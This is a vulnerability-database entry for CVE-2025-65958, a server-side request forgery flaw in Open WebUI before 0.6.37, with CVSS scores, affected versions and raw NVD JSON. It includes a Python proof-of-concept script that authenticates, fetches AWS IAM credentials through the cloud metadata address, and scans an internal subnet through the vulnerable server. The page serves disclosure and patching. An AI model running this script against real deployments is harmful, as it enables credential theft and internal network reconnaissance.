Security Vulnerability Report
中文
CVE-2025-65958 CVSS 8.5 HIGH

CVE-2025-65958

Published: 2025-12-04 20:16:20
Last Modified: 2025-12-10 15:18:38
Source: [email protected]

Description

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:* - VULNERABLE
Open WebUI < 0.6.37

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-65958 SSRF PoC for Open WebUI # Target: Open WebUI < 0.6.37 TARGET_URL = "http://target-ip:8080" USERNAME = "attacker" PASSWORD = "password" def login(): """Authenticate and get session token""" session = requests.Session() login_data = { "email": USERNAME, "password": PASSWORD } response = session.post(f"{TARGET_URL}/api/v1/auth/login", json=login_data) if response.status_code == 200: return session, response.json().get("token") return None, None def ssrf_exploit_aws_metadata(session, token): """Exploit SSRF to access AWS metadata endpoint""" headers = { "Authorization": f"Bearer {token}" } # Target AWS IMDSv2 endpoint exploit_data = { "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/", "method": "GET" } response = session.post( f"{TARGET_URL}/api/v1/external/fetch", json=exploit_data, headers=headers ) print(f"[*] AWS Metadata Response: {response.text}") return response.json() def ssrf_internal_scan(session, token, ip_range): """Scan internal network via SSRF""" headers = { "Authorization": f"Bearer {token}" } results = [] for ip in [f"{ip_range}.{i}" for i in range(1, 255)]: exploit_data = { "url": f"http://{ip}:80/", "method": "GET", "timeout": 2 } try: response = session.post( f"{TARGET_URL}/api/v1/external/fetch", json=exploit_data, headers=headers, timeout=3 ) if response.status_code == 200: results.append(ip) print(f"[+] Found accessible host: {ip}") except: pass return results if __name__ == "__main__": print("[*] CVE-2025-65958 SSRF PoC") session, token = login() if token: print("[+] Login successful") # Example: Access AWS metadata ssrf_exploit_aws_metadata(session, token) else: print("[-] Authentication failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65958", "sourceIdentifier": "[email protected]", "published": "2025-12-04T20:16:19.973", "lastModified": "2025-12-10T15:18:38.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.37, a Server-Side Request Forgery (SSRF) vulnerability in Open WebUI allows any authenticated user to force the server to make HTTP requests to arbitrary URLs. This can be exploited to access cloud metadata endpoints (AWS/GCP/Azure), scan internal networks, access internal services behind firewalls, and exfiltrate sensitive information. No special permissions beyond basic authentication are required. This vulnerability is fixed in 0.6.37."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openwebui:open_webui:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.6.37", "matchCriteriaId": "06C81784-9018-4FE9-89EB-18263EA0B16A"}]}]}], "references": [{"url": "https://github.com/open-webui/open-webui/commit/02238d3113e966c353fce18f1b65117380896774", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-c6xv-rcvw-v685", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.